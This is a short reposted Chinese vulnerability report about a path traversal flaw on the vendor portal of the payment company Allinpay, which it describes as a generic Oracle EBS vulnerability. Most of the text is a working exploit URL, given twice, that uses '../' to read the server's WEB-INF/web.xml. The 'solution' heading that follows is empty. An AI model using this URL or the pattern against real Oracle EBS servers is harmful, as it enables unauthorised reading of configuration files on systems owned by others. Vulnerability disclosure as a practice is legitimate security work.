通联支付某处文件遍历读取漏洞(Oracle ebs系统通用漏洞案例)
程序员文章站
2022-06-27 16:53:59
RT
地址:http://vendor.allinpay.com//OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../W...
RT
地址:http://vendor.allinpay.com//OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml
读取WEB.XML文件
地址:http://vendor.allinpay.com//OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml
利用为oracle ebs系统通用漏洞。
读取WEB.XML文件
解决方案: